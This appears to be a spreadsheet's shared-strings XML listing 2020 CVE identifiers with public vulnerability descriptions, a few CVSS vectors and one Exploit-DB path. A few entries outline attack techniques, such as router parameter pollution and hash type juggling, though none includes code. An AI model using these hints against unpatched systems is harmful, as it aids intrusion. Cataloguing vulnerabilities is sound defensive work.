    <t>The image view functionality in Horde Groupware Webmail Edition before 5.2.22 is affected by a stored Cross-Site Scripting (XSS) vulnerability via an SVG image upload containing a JavaScript payload. An attacker can obtain access to a victim's webmail account by making them visit a malicious URL.</t>
  </si>
  <si>
    <t>CVE-2020-8036</t>
  </si>
  <si>
    <t>The tok2strbuf() function in tcpdump 4.10.0-PRE-GIT was used by the SOME/IP dissector in an unsafe way.</t>
  </si>
  <si>
    <t>CVE-2020-8037</t>
  </si>
  <si>
    <t>The ppp decapsulator in tcpdump 4.9.3 can be convinced to allocate a large amount of memory.</t>
  </si>
  <si>
    <t>CVE-2020-8086</t>
  </si>
  <si>
    <t>The mod_auth_ldap and mod_auth_ldap2 Community Modules through 2020-01-27 for Prosody incompletely verify the XMPP address passed to the is_admin() function. This grants remote entities admin-only functionality if their username matches the username of a local admin.</t>
  </si>
  <si>
    <t>CVE-2020-8087</t>
  </si>
  <si>
    <t>SMC Networks D3G0804W D3GNV5M-3.5.1.6.10_GA devices allow remote command execution by leveraging access to the Network Diagnostic Tools screen, as demonstrated by an admin login. The attacker must use a Parameter Pollution approach against goform/formSetDiagnosticToolsFmPing by providing the vlu_diagnostic_tools__ping_address parameter twice: once with a shell metacharacter and a command name, and once with a command argument.</t>
  </si>
  <si>
    <t>CVE-2020-8088</t>
  </si>
  <si>
    <t>panel_login.php in UseBB 1.0.12 allows type juggling for login bypass because != is used instead of !== for password hashes, which mishandles hashes that begin with 0e followed by exclusively numerical characters.</t>
  </si>
  <si>
    <t>CVE-2020-8089</t>
  </si>
  <si>
    <t>Piwigo 2.10.1 is affected by stored XSS via the Group Name Field to the group_list page.</t>
  </si>
  <si>
    <t>CVE-2020-8090</t>
  </si>
  <si>
    <t>The Username field in the Storage Service settings of A1 WLAN Box ADB VV2220v2 devices allows stored XSS (after a successful Administrator login).</t>
  </si>
  <si>
    <t>CVE-2020-8091</t>
  </si>
  <si>
    <t>svg.swf in TYPO3 6.2.0 to 6.2.38 ELTS and 7.0.0 to 7.1.0 could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack on a targeted system. This may be at a contrib/websvg/svg.swf pathname.</t>
  </si>
  <si>
    <t>CVE-2020-8092</t>
  </si>
  <si>
    <t>A privilege escalation vulnerability in BDLDaemon as used in Bitdefender Antivirus for Mac allows a local attacker to obtain authentication tokens for requests submitted to the Bitdefender Cloud. This issue affects: Bitdefender Bitdefender Antivirus for Mac versions prior to 8.0.0.</t>
  </si>
  <si>
    <t>CVE-2020-8093</t>
  </si>
  <si>
    <t>A vulnerability in the AntivirusforMac binary as used in Bitdefender Antivirus for Mac allows an attacker to inject a library using DYLD environment variable to cause third-party code execution</t>
  </si>
  <si>
    <t>CVE-2020-8095</t>
  </si>
  <si>
    <t>A vulnerability in the improper handling of junctions before deletion in Bitdefender Total Security 2020 can allow an attacker to to trigger a denial of service on the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-8096</t>
  </si>
  <si>
    <t>Untrusted Search Path vulnerability in Bitdefender High-Level Antimalware SDK for Windows allows an attacker to load third party code from a DLL library in the search path. This issue affects: Bitdefender High-Level Antimalware SDK for Windows versions prior to 3.0.1.204 .</t>
  </si>
  <si>
    <t>CVE-2020-8097</t>
  </si>
  <si>
    <t>An improper authentication vulnerability in Bitdefender Endpoint Security Tools for Windows and Bitdefender Endpoint Security SDK allows an unprivileged local attacker to escalate privileges or tamper with the product's security settings. This issue affects: Bitdefender Endpoint Security Tools for Windows versions prior to 6.6.18.261. This issue affects: Bitdefender Endpoint Security Tools for Windows versions prior to 6.6.18.261. Bitdefender Endpoint Security SDK versions prior to 6.6.18.261.</t>
  </si>
  <si>
    <t>CVE-2020-8099</t>
  </si>
  <si>
    <t>A vulnerability in the improper handling of junctions in Bitdefender Antivirus Free can allow an unprivileged user to substitute a quarantined file, and restore it to a privileged location. This issue affects: Bitdefender Antivirus Free versions prior to 1.0.17.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L</t>
  </si>
  <si>
    <t>CVE-2020-8100</t>
  </si>
  <si>
    <t>Improper Input Validation vulnerability in the cevakrnl.rv0 module as used in the Bitdefender Engines allows an attacker to trigger a denial of service while scanning a specially-crafted sample. This issue affects: Bitdefender Bitdefender Engines versions prior to 7.84063.</t>
  </si>
  <si>
    <t>CVE-2020-8101</t>
  </si>
  <si>
    <t>Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in HTTP interface of ADT LifeShield DIY HD Video Doorbell allows an attacker on the same network to execute commands on the device. This issue affects: ADT LifeShield DIY HD Video Doorbell version 1.0.02R09 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-8102</t>
  </si>
  <si>
    <t>Improper Input Validation vulnerability in the Safepay browser component of Bitdefender Total Security 2020 allows an external, specially crafted web page to run remote commands inside the Safepay Utility process. This issue affects Bitdefender Total Security 2020 versions prior to 24.0.20.116.</t>
  </si>
  <si>
    <t>CVE-2020-8103</t>
  </si>
  <si>
    <t>A vulnerability in the improper handling of symbolic links in Bitdefender Antivirus Free can allow an unprivileged user to substitute a quarantined file, and restore it to a privileged location. This issue affects Bitdefender Antivirus Free versions prior to 1.0.17.178.</t>
  </si>
  <si>
    <t>CVE-2020-8105</t>
  </si>
  <si>
    <t>OS Command Injection vulnerability in the wirelessConnect handler of Abode iota All-In-One Security Kit allows an attacker to inject commands and gain root access. This issue affects: Abode iota All-In-One Security Kit versions prior to 1.0.2.23_6.9V_dev_t2_homekit_RF_2.0.19_s2_kvsABODE oz.</t>
  </si>
  <si>
    <t>CVE-2020-8107</t>
  </si>
  <si>
    <t>A Process Control vulnerability in ProductAgentUI.exe as used in Bitdefender Antivirus Plus allows an attacker to tamper with product settings via a specially crafted DLL file. This issue affects: Bitdefender Antivirus Plus versions prior to 24.0.26.136. Bitdefender Internet Security versions prior to 24.0.26.136. Bitdefender Total Security versions prior to 24.0.26.136.</t>
  </si>
  <si>
    <t>CVE-2020-8108</t>
  </si>
  <si>
    <t>Improper Authentication vulnerability in Bitdefender Endpoint Security for Mac allows an unprivileged process to restart the main service and potentially inject third-party code into a trusted process. This issue affects: Bitdefender Endpoint Security for Mac versions prior to 4.12.80.</t>
  </si>
  <si>
    <t>CVE-2020-8109</t>
  </si>
  <si>
    <t>A vulnerability has been discovered in the ace.xmd parser that results from a lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. This can result in denial-of-service. This issue affects: Bitdefender Engines version 7.84892 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-8110</t>
  </si>
  <si>
    <t>A vulnerability has been discovered in the ceva_emu.cvd module that results from a lack of proper validation of user-supplied data, which can result in a pointer that is fetched from uninitialized memory. This can lead to denial-of-service. This issue affects: Bitdefender Engines version 7.84897 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2020-8112</t>
  </si>
  <si>
    <t>opj_t1_clbl_decode_processor in openjp2/t1.c in OpenJPEG 2.3.1 through 2020-01-28 has a heap-based buffer overflow in the qmfbid==1 case, a different issue than CVE-2020-6851.</t>
  </si>
  <si>
    <t>CVE-2020-8113</t>
  </si>
  <si>
    <t>GitLab 10.7 and later through 12.7.2 has Incorrect Access Control.</t>
  </si>
  <si>
    <t>CVE-2020-8114</t>
  </si>
  <si>
    <t>CVE-2020-8115</t>
  </si>
  <si>
    <t>A reflected XSS vulnerability has been discovered in the publicly accessible afr.php delivery script of Revive Adserver &lt;= 5.0.3 by Jacopo Tediosi. There are currently no known exploits: the session identifier cannot be accessed as it is stored in an http-only cookie as of v3.2.2. On older versions, however, under specific circumstances, it could be possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escaping in a JavaScript context, allowing an attacker to execute arbitrary JS code on the browser of the victim.</t>
  </si>
  <si>
    <t>CVE-2020-8116</t>
  </si>
  <si>
    <t>Prototype pollution vulnerability in dot-prop npm package versions before 4.2.1 and versions 5.x before 5.1.1 allows an attacker to add arbitrary properties to JavaScript language constructs such as objects.</t>
  </si>
  <si>
    <t>CVE-2020-8117</t>
  </si>
  <si>
    <t>Improper preservation of permissions in Nextcloud Server 14.0.3 causes the event details to be leaked when sharing a non-public event.</t>
  </si>
  <si>
    <t>CVE-2020-8118</t>
  </si>
  <si>
    <t>An authenticated server-side request forgery in Nextcloud server 16.0.1 allowed to detect local and remote services when adding a new subscription in the calendar application.</t>
  </si>
  <si>
    <t>CVE-2020-8119</t>
  </si>
  <si>
    <t>Improper authorization in Nextcloud server 17.0.0 causes leaking of previews and files when a file-drop share link is opened via the gallery app.</t>
  </si>
  <si>
    <t>CVE-2020-8120</t>
  </si>
  <si>
    <t>A reflected Cross-Site Scripting vulnerability in Nextcloud Server 16.0.1 was discovered in the svg generation.</t>
  </si>
  <si>
    <t>CVE-2020-8121</t>
  </si>
  <si>
    <t>A bug in Nextcloud Server 14.0.4 could expose more data in reshared link shares than intended by the sharer.</t>
  </si>
  <si>
    <t>CVE-2020-8122</t>
  </si>
  <si>
    <t>A missing check in Nextcloud Server 14.0.3 could give recipient the possibility to extend the expiration date of a share they received.</t>
  </si>
  <si>
    <t>CVE-2020-8123</t>
  </si>
  <si>
    <t>A denial of service exists in strapi v3.0.0-beta.18.3 and earlier that can be abused in the admin console using admin rights can lead to arbitrary restart of the application.</t>
  </si>
  <si>
    <t>CVE-2020-8124</t>
  </si>
  <si>
    <t>Insufficient validation and sanitization of user input exists in url-parse npm package version 1.4.4 and earlier may allow attacker to bypass security checks.</t>
  </si>
  <si>
    <t>CVE-2020-8125</t>
  </si>
  <si>
    <t>Flaw in input validation in npm package klona version 1.1.0 and earlier may allow prototype pollution attack that may result in remote code execution or denial of service of applications using klona.</t>
  </si>
  <si>
    <t>CVE-2020-8126</t>
  </si>
  <si>
    <t>A privilege escalation in the EdgeSwitch prior to version 1.7.1, an CGI script don't fully sanitize the user input resulting in local commands execution, allowing an operator user (Privilege-1) to escalate privileges and became administrator (Privilege-15).</t>
  </si>
  <si>
    <t>CVE-2020-8127</t>
  </si>
  <si>
    <t>Insufficient validation in cross-origin communication (postMessage) in reveal.js version 3.9.1 and earlier allow attackers to perform cross-site scripting attacks.</t>
  </si>
  <si>
    <t>CVE-2020-8128</t>
  </si>
  <si>
    <t>An unintended require and server-side request forgery vulnerabilities in jsreport version 2.5.0 and earlier allow attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-8129</t>
  </si>
  <si>
    <t>An unintended require vulnerability in script-manager npm package version 0.8.6 and earlier may allow attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-8130</t>
  </si>
  <si>
    <t>There is an OS command injection vulnerability in Ruby Rake &lt; 12.3.3 in Rake::FileList when supplying a filename that begins with the pipe character `|`.</t>
  </si>
  <si>
    <t>CVE-2020-8131</t>
  </si>
  <si>
    <t>Arbitrary filesystem write vulnerability in Yarn before 1.22.0 allows attackers to write to any path on the filesystem and potentially lead to arbitrary code execution by forcing the user to install a malicious package.</t>
  </si>
  <si>
    <t>CVE-2020-8132</t>
  </si>
  <si>
    <t>Lack of input validation in pdf-image npm package version &lt;= 2.0.0 may allow an attacker to run arbitrary code if PDF file path is constructed based on untrusted user input.</t>
  </si>
  <si>
    <t>CVE-2020-8133</t>
  </si>
  <si>
    <t>A wrong generation of the passphrase for the encrypted block in Nextcloud Server 19.0.1 allowed an attacker to overwrite blocks in a file.</t>
  </si>
  <si>
    <t>CVE-2020-8134</t>
  </si>
  <si>
    <t>Server-side request forgery (SSRF) vulnerability in Ghost CMS &lt; 3.10.0 allows an attacker to scan local or external network or otherwise interact with internal systems.</t>
  </si>
  <si>
    <t>CVE-2020-8135</t>
  </si>
  <si>
    <t>The uppy npm package &lt; 1.9.3 is vulnerable to a Server-Side Request Forgery (SSRF) vulnerability, which allows an attacker to scan local or external network or otherwise interact with internal systems.</t>
  </si>
  <si>
    <t>CVE-2020-8136</t>
  </si>
  <si>
    <t>Prototype pollution vulnerability in fastify-multipart &lt; 1.0.5 allows an attacker to crash fastify applications parsing multipart requests by sending a specially crafted request.</t>
  </si>
  <si>
    <t>CVE-2020-8137</t>
  </si>
  <si>
    <t>Code injection vulnerability in blamer 1.0.0 and earlier may result in remote code execution when the input can be controlled by an attacker.</t>
  </si>
  <si>
    <t>CVE-2020-8138</t>
  </si>
  <si>
    <t>A missing check for IPv4 nested inside IPv6 in Nextcloud server &lt; 17.0.1, &lt; 16.0.7, and &lt; 15.0.14 allowed a Server-Side Request Forgery (SSRF) vulnerability when subscribing to a malicious calendar URL.</t>
  </si>
  <si>
    <t>CVE-2020-8139</t>
  </si>
  <si>
    <t>A missing access control check in Nextcloud Server &lt; 18.0.1, &lt; 17.0.4, and &lt; 16.0.9 causes hide-download shares to be downloadable when appending /download to the URL.</t>
  </si>
  <si>
    <t>CVE-2020-8140</t>
  </si>
  <si>
    <t>A code injection in Nextcloud Desktop Client 2.6.2 for macOS allowed to load arbitrary code when starting the client with DYLD_INSERT_LIBRARIES set in the environment.</t>
  </si>
  <si>
    <t>CVE-2020-8141</t>
  </si>
  <si>
    <t>The dot package v1.1.2 uses Function() to compile templates. This can be exploited by the attacker if they can control the given template or if they can control the value set on Object.prototype.</t>
  </si>
  <si>
    <t>CVE-2020-8142</t>
  </si>
  <si>
    <t>A security restriction bypass vulnerability has been discovered in Revive Adserver version &lt; 5.0.5 by HackerOne user hoangn144. Revive Adserver, like many other applications, requires the logged in user to type the current password in order to change the e-mail address or the password. It was however possible for anyone with access to a Revive Adserver admin user interface to bypass such check and change e-email address or password of the currently logged in user by altering the form payload.The attack requires physical access to the user interface of a logged in user. If the POST payload was altered by turning the “pwold” parameter into an array, Revive Adserver would fetch and authorise the operation even if no password was provided.</t>
  </si>
  <si>
    <t>CVE-2020-8143</t>
  </si>
  <si>
    <t>An Open Redirect vulnerability was discovered in Revive Adserver version &lt; 5.0.5 and reported by HackerOne user hoangn144. A remote attacker could trick logged-in users to open a specifically crafted link and have them redirected to any destination.The CSRF protection of the “/www/admin/*-modify.php” could be skipped if no meaningful parameter was sent. No action was performed, but the user was still redirected to the target page, specified via the “returnurl” GET parameter.</t>
  </si>
  <si>
    <t>CVE-2020-8144</t>
  </si>
  <si>
    <t>The UniFi Video Server v3.9.3 and prior (for Windows 7/8/10 x64) web interface Firmware Update functionality, under certain circumstances, does not validate firmware download destinations to ensure they are within the intended destination directory tree. It accepts a request with a URL to firmware update information. If the version field contains ..\ character sequences, the destination file path to save the firmware can be manipulated to be outside the intended destination directory tree. Fixed in UniFi Video Controller v3.10.3 and newer.</t>
  </si>
  <si>
    <t>CVE-2020-8145</t>
  </si>
  <si>
    <t>The UniFi Video Server (Windows) web interface configuration restore functionality at the “backup” and “wizard” endpoints does not implement sufficient privilege checks. Low privileged users, belonging to the PUBLIC_GROUP or CUSTOM_GROUP groups, can access these endpoints and overwrite the current application configuration. This can be abused for various purposes, including adding new administrative users. Affected Products: UniFi Video Controller v3.9.3 (for Windows 7/8/10 x64) and prior. Fixed in UniFi Video Controller v3.9.6 and newer.</t>
  </si>
  <si>
    <t>CVE-2020-8146</t>
  </si>
  <si>
    <t>In UniFi Video v3.10.1 (for Windows 7/8/10 x64) there is a Local Privileges Escalation to SYSTEM from arbitrary file deletion and DLL hijack vulnerabilities. The issue was fixed by adjusting the .tsExport folder when the controller is running on Windows and adjusting the SafeDllSearchMode in the windows registry when installing UniFi-Video controller. Affected Products: UniFi Video Controller v3.10.2 (for Windows 7/8/10 x64) and prior. Fixed in UniFi Video Controller v3.10.3 and newer.</t>
  </si>
  <si>
    <t>CVE-2020-8147</t>
  </si>
  <si>
    <t>Flaw in input validation in npm package utils-extend version 1.0.8 and earlier may allow prototype pollution attack that may result in remote code execution or denial of service of applications using utils-extend.</t>
  </si>
  <si>
    <t>CVE-2020-8148</t>
  </si>
  <si>
    <t>UniFi Cloud Key firmware &lt; 1.1.6 contains a vulnerability that enables an attacker being able to change a device hostname by sending a malicious API request. This affects Cloud Key gen2 and Cloud Key gen2 Plus.</t>
  </si>
  <si>
    <t>CVE-2020-8149</t>
  </si>
  <si>
    <t>Lack of output sanitization allowed an attack to execute arbitrary shell commands via the logkitty npm package before version 0.7.1.</t>
  </si>
  <si>
    <t>CVE-2020-8150</t>
  </si>
  <si>
    <t>A cryptographic issue in Nextcloud Server 19.0.1 allowed an attacker to downgrade the encryption scheme and break the integrity of encrypted files.</t>
  </si>
  <si>
    <t>CVE-2020-8151</t>
  </si>
  <si>
    <t>There is a possible information disclosure issue in Active Resource &lt;v5.1.1 that could allow an attacker to create specially crafted requests to access data in an unexpected way and possibly leak information.</t>
  </si>
  <si>
    <t>CVE-2020-8152</t>
  </si>
  <si>
    <t>Insufficient protection of the server-side encryption keys in Nextcloud Server 19.0.1 allowed an attacker to replace the public key to decrypt them later on.</t>
  </si>
  <si>
    <t>CVE-2020-8153</t>
  </si>
  <si>
    <t>Improper access control in Groupfolders app 4.0.3 allowed to delete hidden directories when when renaming an accessible item to the same name.</t>
  </si>
  <si>
    <t>CVE-2020-8154</t>
  </si>
  <si>
    <t>An Insecure direct object reference vulnerability in Nextcloud Server 18.0.2 allowed an attacker to remote wipe devices of other users when sending a malicious request directly to the endpoint.</t>
  </si>
  <si>
    <t>CVE-2020-8155</t>
  </si>
  <si>
    <t>An outdated 3rd party library in the Files PDF viewer for Nextcloud Server 18.0.2 caused a Cross-site scripting vulnerability when opening a malicious PDF.</t>
  </si>
  <si>
    <t>CVE-2020-8156</t>
  </si>
  <si>
    <t>A missing verification of the TLS host in Nextcloud Mail 1.1.3 allowed a man in the middle attack.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2020-8157</t>
  </si>
  <si>
    <t>UniFi Cloud Key firmware &lt;= v1.1.10 for Cloud Key gen2 and Cloud Key gen2 Plus contains a vulnerability that allows unrestricted root access through the serial interface (UART).</t>
  </si>
  <si>
    <t>CVE-2020-8158</t>
  </si>
  <si>
    <t>Prototype pollution vulnerability in the TypeORM package &lt; 0.2.25 may allow attackers to add or modify Object properties leading to further denial of service or SQL injection attacks.</t>
  </si>
  <si>
    <t>CVE-2020-8159</t>
  </si>
  <si>
    <t>There is a vulnerability in actionpack_page-caching gem &lt; v1.2.1 that allows an attacker to write arbitrary files to a web server, potentially resulting in remote code execution if the attacker can write unescaped ERB to a view.</t>
  </si>
  <si>
    <t>CVE-2020-8160</t>
  </si>
  <si>
    <t>MendixSSO &lt;= 2.1.1 contains endpoints that make use of the openid handler, which is suffering from a Cross-Site Scripting vulnerability via the URL path. This is caused by the reflection of user-supplied data without appropriate HTML escaping or output encoding. As a result, a JavaScript payload may be injected into the above endpoint causing it to be executed within the context of the victim's browser.</t>
  </si>
  <si>
    <t>CVE-2020-8161</t>
  </si>
  <si>
    <t>A directory traversal vulnerability exists in rack &lt; 2.2.0 that allows an attacker perform directory traversal vulnerability in the Rack::Directory app that is bundled with Rack which could result in information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-8162</t>
  </si>
  <si>
    <t>A client side enforcement of server side security vulnerability exists in rails &lt; 5.2.4.2 and rails &lt; 6.0.3.1 ActiveStorage's S3 adapter that allows the Content-Length of a direct file upload to be modified by an end user bypassing upload limits.</t>
  </si>
  <si>
    <t>CVE-2020-8163</t>
  </si>
  <si>
    <t>The is a code injection vulnerability in versions of Rails prior to 5.0.1 that wouldallow an attacker who controlled the `locals` argument of a `render` call to perform a RCE.</t>
  </si>
  <si>
    <t>exploits/ruby/webapps/48716.rb</t>
  </si>
  <si>
    <t>Rails 5.0.1 - Remote Code Execution</t>
  </si>
  <si>
    <t>CVE-2020-8164</t>
  </si>
  <si>
    <t>A deserialization of untrusted data vulnerability exists in rails &lt; 5.2.4.3, rails &lt; 6.0.3.1 which can allow an attacker to supply information can be inadvertently leaked fromStrong Parameters.</t>
  </si>
  <si>
    <t>CVE-2020-8165</t>
  </si>
  <si>
    <t>A deserialization of untrusted data vulnernerability exists in rails &lt; 5.2.4.3, rails &lt; 6.0.3.1 that can allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore potentially resulting in an RCE.</t>
  </si>
  <si>
    <t>CVE-2020-8166</t>
  </si>
  <si>
    <t>A CSRF forgery vulnerability exists in rails &lt; 5.2.5, rails &lt; 6.0.4 that makes it possible for an attacker to, given a global CSRF token such as the one present in the authenticity_token meta tag, forge a per-form CSRF token.</t>
  </si>
  <si>
    <t>CVE-2020-8167</t>
  </si>
  <si>
    <t>A CSRF vulnerability exists in rails &lt;= 6.0.3 rails-ujs module that could allow attackers to send CSRF tokens to wrong domains.</t>
  </si>
  <si>
    <t>CVE-2020-8168</t>
  </si>
  <si>
    <t>We have recently released new version of AirMax AirOS firmware v6.3.0 for TI, XW and XM boards that fixes vulnerabilities found on AirMax AirOS v6.2.0 and prior TI, XW and XM boards, according to the description below:Attackers can abuse multiple end-points not protected against cross-site request forgery (CSRF), as a result authenticated users can be persuaded to visit malicious web pages, which allows attackers to perform arbitrary actions, such as downgrade the device's firmware to older versions, modify configuration, upload arbitrary firmware, exfiltrate files and tokens.Mitigation:Update to the latest AirMax AirOS firmware version available at the AirMax download page.</t>
  </si>
  <si>
    <t>CVE-2020-8169</t>
  </si>
  <si>
    <t>curl 7.62.0 through 7.70.0 is vulnerable to an information disclosure vulnerability that can lead to a partial password being leaked over the network and to the DNS server(s).</t>
  </si>
  <si>
    <t>CVE-2020-8170</t>
  </si>
  <si>
    <t>We have recently released new version of AirMax AirOS firmware v6.3.0 for TI, XW and XM boards that fixes vulnerabilities found on AirMax AirOS v6.2.0 and prior TI, XW and XM boards, according to the description below:Multiple end-points with parameters vulnerable to reflected cross site scripting (XSS), allowing attackers to abuse the user' session information and/or account takeover of the admin user.Mitigation:Update to the latest AirMax AirOS firmware version available at the AirMax download page.</t>
  </si>
  <si>
    <t>CVE-2020-8171</t>
  </si>
  <si>
    <t>We have recently released new version of AirMax AirOS firmware v6.3.0 for TI, XW and XM boards that fixes vulnerabilities found on AirMax AirOS v6.2.0 and prior TI, XW and XM boards, according to the description below:There are certain end-points containing functionalities that are vulnerable to command injection. It is possible to craft an input string that passes the filter check but still contains commands, resulting in remote code execution.Mitigation:Update to the latest AirMax AirOS firmware version available at the AirMax download page.</t>
  </si>
  <si>
    <t>CVE-2020-8172</t>
  </si>
  <si>
    <t>TLS session reuse can lead to host certificate verification bypass in node version &lt; 12.18.0 and &lt; 14.4.0.</t>
  </si>
  <si>
    <t>CVE-2020-8173</t>
  </si>
  <si>
    <t>A too small set of random characters being used for encryption in Nextcloud Server 18.0.4 allowed decryption in shorter time than intended.</t>
  </si>
  <si>
    <t>CVE-2020-8174</t>
  </si>
  <si>
    <t>napi_get_value_string_*() allows various kinds of memory corruption in node &lt; 10.21.0, 12.18.0, and &lt; 14.4.0.</t>
  </si>
  <si>
    <t>CVE-2020-8175</t>
  </si>
  <si>
    <t>Uncontrolled resource consumption in `jpeg-js` before 0.4.0 may allow attacker to launch denial of service attacks using specially a crafted JPEG image.</t>
  </si>
  <si>
    <t>CVE-2020-8176</t>
  </si>
  <si>
    <t>A cross-site scripting vulnerability exists in koa-shopify-auth v3.1.61-v3.1.62 that allows an attacker to inject JS payloads into the `shop` parameter on the `/shopify/auth/enable_cookies` endpoint.</t>
  </si>
  <si>
    <t>CVE-2020-8177</t>
  </si>
  <si>
    <t>curl 7.20.0 through 7.70.0 is vulnerable to improper restriction of names for files and other resources that can lead too overwriting a local file when the -J flag is used.</t>
  </si>
  <si>
    <t>CVE-2020-8178</t>
  </si>
  <si>
    <t>Insufficient input validation in npm package `jison` &lt;= 0.4.18 may lead to OS command injection attacks.</t>
  </si>
  <si>
    <t>CVE-2020-8179</t>
  </si>
  <si>
    <t>Improper access control in Nextcloud Deck 1.0.0 allowed an attacker to inject tasks into other users decks.</t>
  </si>
  <si>
    <t>CVE-2020-8180</t>
  </si>
  <si>
    <t>A too lax check in Nextcloud Talk 6.0.4, 7.0.2 and 8.0.7 allowed a code injection when a not correctly sanitized talk command was added by an administrator.</t>
  </si>
  <si>
    <t>CVE-2020-8181</t>
  </si>
  <si>
    <t>A missing file type check in Nextcloud Contacts 3.2.0 allowed a malicious user to upload any file as avatars.</t>
  </si>
  <si>
    <t>CVE-2020-8182</t>
  </si>
  <si>
    <t>Improper access control in Nextcloud Deck 0.8.0 allowed an attacker to reshare boards shared with them with more permissions than they had themselves.</t>
  </si>
  <si>
    <t>CVE-2020-8183</t>
  </si>
  <si>
    <t>A logic error in Nextcloud Server 19.0.0 caused a plaintext storage of the share password when it was given on the initial create API call.</t>
  </si>
  <si>
    <t>CVE-2020-8184</t>
  </si>
  <si>
    <t>A reliance on cookies without validation/integrity check security vulnerability exists in rack &lt; 2.2.3, rack &lt; 2.1.4 that makes it is possible for an attacker to forge a secure or host-only cookie prefix.</t>
  </si>
  <si>
    <t>CVE-2020-8185</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists in Rails &lt;6.0.3.2 that allowed an untrusted user to run any pending migrations on a Rails app running in production.</t>
  </si>
  <si>
    <t>CVE-2020-8186</t>
  </si>
  <si>
    <t>A command injection vulnerability in the `devcert` module may lead to remote code execution when users of the module pass untrusted input to the `certificateFor` function.</t>
  </si>
  <si>
    <t>CVE-2020-8187</t>
  </si>
  <si>
    <t>Improper input validation in Citrix ADC and Citrix Gateway versions before 11.1-63.9 and 12.0-62.10 allows unauthenticated users to perform a denial of service attack.</t>
  </si>
  <si>
    <t>CVE-2020-8188</t>
  </si>
  <si>
    <t>We have recently released new version of UniFi Protect firmware v1.13.3 and v1.14.10 for Unifi Cloud Key Gen2 Plus and UniFi Dream Machine Pro/UNVR respectively that fixes vulnerabilities found on Protect firmware v1.13.2, v1.14.9 and prior according to the description below:View only users can run certain custom commands which allows them to assign themselves unauthorized roles and escalate their privileges.</t>
  </si>
  <si>
    <t>CVE-2020-8189</t>
  </si>
  <si>
    <t>A cross-site scripting error in Nextcloud Desktop client 2.6.4 allowed to present any html (including local links) when responding with invalid data on the login attempt.</t>
  </si>
  <si>
    <t>CVE-2020-8190</t>
  </si>
  <si>
    <t>Incorrect file permissions in Citrix ADC and Citrix Gateway before versions 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 allows privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-8191</t>
  </si>
  <si>
    <t>Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows reflected Cross Site Scripting (XSS).</t>
  </si>
  <si>
    <t>CVE-2020-8192</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists in Fastify v2.14.1 and v3.0.0-rc.4 that allows a malicious user to trigger resource exhaustion (when the allErrors option is used) with specially crafted schemas.</t>
  </si>
  <si>
    <t>CVE-2020-8193</t>
  </si>
  <si>
    <t>Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints.</t>
  </si>
  <si>
    <t>CVE-2020-8194</t>
  </si>
  <si>
    <t>Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download.</t>
  </si>
  <si>
    <t>CVE-2020-8195</t>
  </si>
  <si>
    <t>Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 resulting in limited information disclosure to low privileged users.</t>
  </si>
  <si>
    <t>CVE-2020-8196</t>
  </si>
  <si>
    <t>Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 resulting in limited information disclosure to low privileged users.</t>
  </si>
  <si>
    <t>CVE-2020-8197</t>
  </si>
  <si>
    <t>Privilege escalation vulnerability on Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 allows a low privileged user with management access to execute arbitrary commands.</t>
  </si>
  <si>
    <t>CVE-2020-8198</t>
  </si>
  <si>
    <t>Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 resulting in Stored Cross-Site Scripting (XSS).</t>
  </si>
  <si>
    <t>CVE-2020-8199</t>
  </si>
  <si>
    <t>Improper access control in Citrix ADC Gateway Linux client versions before 1.0.0.137 results in local privilege escalation to root.</t>
  </si>
  <si>
    <t>CVE-2020-8200</t>
  </si>
  <si>
    <t>Improper authentication in Citrix StoreFront Server &lt; 1912.0.1000 allows an attacker who is authenticated on the same Microsoft Active Directory domain as a Citrix StoreFront server to read arbitrary files from that server.</t>
  </si>
  <si>
    <t>CVE-2020-8201</t>
  </si>
  <si>
